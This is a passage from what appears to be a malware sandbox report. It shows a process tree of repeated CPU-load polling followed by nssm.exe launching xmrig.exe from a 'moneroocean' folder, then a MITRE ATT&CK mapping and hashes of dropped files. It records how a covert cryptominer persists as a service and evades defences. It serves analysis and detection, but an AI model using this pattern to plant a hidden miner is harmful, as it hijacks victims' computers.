      PID:592
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:704
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:64
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1960
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3156
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1688
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4672
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5084
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5116
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4260
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1056
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3528
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:504
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4356
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4424
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1116
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2500
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1188
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1836
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1672
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1392
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4148
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2100
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1908
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3396
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:32
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4152
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4728
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3380
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4232
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4300
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2588
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2808
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4196
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4308
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4504
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:872
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3716
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4312
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1856
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3728
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:664
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1184
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1648
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4120
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3952
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1712
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4996
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2344
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:792
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3316
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3584
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:508
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:704
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3476
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4484
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5044
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:596
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2876
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3536
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2740
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2408
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3928
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4604
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2736
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1848
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4992
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3340
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1080
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2192
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1416
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3108
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1864
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4840
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3132
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3396
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1200
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4152
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:600
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4268
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4232
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1296
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4832
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2920
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2392
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:824
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1064
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2688
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3716
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3356
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3172
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3488
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3432
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4612
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:664
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3892
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1480
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:424
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1388
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4720
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4492
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3868
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4284
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4144
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:648
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:960
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3476
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5044
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3156
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1988
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4672
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:364

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:3600
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ea6243fdb2bfcca2211884b0a21a0afc

SHA1
2eee5232ca6acc33c3e7de03900e890f4adf0f2f

SHA256
5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

SHA512
189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9fbfd0d996d0f2e7edd55a8b34deac19

SHA1
718c714c81877745a262d5d61e107d5eab9a5e53

SHA256
dc1274a61c039b77d8f6568641ebd1d551da553888b6f84e863a60f91e28138e

SHA512
7e07a336e4c2b177acf8db15d7493851c155cd72cced1940d1e5e5b56546ce720fb14e61b354c6ae761faf83c656d22a6f744fe0260df5bd0f34fdda23a1a9e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
908726ad025976aa3533550f26d8f9e7

SHA1
f31f89da90805e45be680844a86558e4993aa7ca

SHA256
ea2e71451c24aa09552e7c0213d4512fa2229ac6ad8c0bdd42255efd5cd4acc1

SHA512
c9b069c455fe06e9bad834c61baea9a507a71434e99afa5a51754b35cd356baf3b907f180ac0cae46aa867a4365691ae416645e1e8e1e28b8ee3e1f34c5b5589

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d61b2de245e4f23dc4383fddfa53d91c

SHA1
1209004175d7b246c6c0a33e266e70f687b14f61

SHA256
b2f6dbf4d0cd5d457d5e3e71d260b23845c73e5c314ea7f8f91baed7bcd374bb

SHA512
47f3342fc2fb8f05fe61adf56908d40902c8621e1b0afa76bc326f01033bd89ecd705e539691ec8d22fa18af5f5111c4046e4432b949be7a79b64549cdf6eed6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5d158337cc5927419336c48f33f04acb

SHA1
ee5152f7cb8102b6390756eba97f61add5720e32

SHA256
77bdf78f269cc0fe554f34027260160297a7e1cde75366a6869c47929391b52f

SHA512
7f2055de98d7d68ed66dac706f859a67b203b1d88fdd1e65335b9222ea9e72d3fe8e636a1122f2e2ac4ba11da27f4a28ac53344e55bf6a0d8932253fff0c6094

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5086727383913b09209815c52269d638

SHA1
f367fd9d0f29826cc9533224686eef4b470eabb9

SHA256
6c42373c356ddc3d75daafb1e8791f4fb9656ca8ced2fde868422e8cb5b1f303

SHA512
97722d47a2a53a22abc202a0aa0e002ddd9c3458fa47813d725b73fc3902c2fc777ae78a5d2a0365569f4baf35f38f3efd02ace84553fb526ef76e0fa4e41e0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f97386225b3b883e4ade8c108a5f80f

SHA1
bb690e8fc5dfa1229320021e37edbadb2701e979

SHA256
fc9e833d696cda364e7540b1465864b24bd6addba043fd6ee16b79432a010d6c

SHA512
260dca75e2859e176fcf737729da832188cdd39862edf1a68cd4764651d07a4efd9b8363e01d1f7755f39197cf4687f49fd2c244b162ef18ba95c4f67b6812bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
94cae56c5ec4bb6f3dc666030ff5fffa

SHA1
b1a2c7e37b4d5dce4c21a0fa774294cf0fb38b84

SHA256
e641baa2d3fdd34f6ee08748ebe7132d0c9cf66abe15d4ef8d2460e015be5b20

SHA512
c8ed4c4ed4fffccf04e5a83f2275a5982e8f45ba43d697ed8eef369dffba46245b2eefb81b926c52e7eadfb76c172dc9936e88ad540d9e5e7da74a13369d0b5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
41d98c91a0687453f60aa47b1b5a7c4b

SHA1
ef6a14af07eb22dbdc1646cae603c2d096037224

SHA256
6beaf759704d46ce1e4c2bb48e96cc32d671a4f65d88889d9b818d27c7b9c1b3

SHA512
a1a532fbb09d49f379f30f759c9bdbd89314668a74b4e221676611313941777bea83d09853ab070b0d3e8f8d5a70513b3d4905f79d2d3a336d669bf45302c8dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c13b140c19cc6c2a9338bfe5d69a0da2

SHA1
22ec275b51f4a1b107b43bf1bdeac862cbf60115

SHA256
e4c4b290b8e1d2822b08886567317d4da6b297d9d0cb4f9b6d2a9110112e0ff9

SHA512
9c8d63e43ecc881ad01bb22c7accd3a5fe0cee89dd6518b8d6c5b15dfc00cd2d274a899f61ed7497e8e1e00b7ea925cce9b5bcd6f659a4578973e3279cfe8db7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4468f02b41e3e86e7e126204813ee192

SHA1
babe1ebd20b38026f642fc8782e72488f2cb8ced

SHA256
dbeddf53fc411ebb246b46e1079bd268853a30aecd5ecc66883c49251b3d412e

SHA512
6d819c4d6155e84a3c3a89c65a7b07ea1830f3a10bab06896ca2c1c5b37f42745c3a6acb8cefcf50f1b58d329c9537149c042934faf2733a2bf0769a728eb25d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
17d992870a42850fd28b1d0d17abe689

SHA1
415f9e6ee56988eca35ee8edcd3bbf6a279ed8fe

SHA256
d1663bfbfbc62e9adeb7e4067049d8ceb1d35ad42a28e868155dd4dca3543ba2

SHA512
0df7129266a1dac6624b1a3619165d20d30a3e7894f87d4dd22142e3513a2f1b2d4a29fca11e4cb537e07792fdec44a5bd7421837aac06c8372b475b18770ff1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
119e25101870cd77a1a23db8c360c90c

SHA1
7499044ebdec7b9b93831e3308aee8a3d0dbc347

SHA256
c0db45728af17548285fdf2281b6982e6df8d54ecd35b76d6e8df6e761e581b9

SHA512
079cf760c28ad450073e2475021cd04d9ede0f8bb85e3d1ed565cce2fc96bf1cdb8ad7232067126aa0236d7b31ecda01bd339265826241da348aff8fdf3f3037

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1808dfb65984d49c8b652162485f06a5

SHA1
88c6a94131328afb2437c9ce6a165c10db48e5c9

SHA256
02ae35093f20c0bca3b83dbbe376f84411d9c7ecf6866353c33b4cfb7be57af1

SHA512
62c1601f1a92b65a8407a23441ec319afa21527246dd5fcf7ca79d62a3befc7ff49bd29d8e76ee9d74b08a68b2089268664edb8612fc81f4044ed69da7cb33d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2oj0xe4l.05x.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
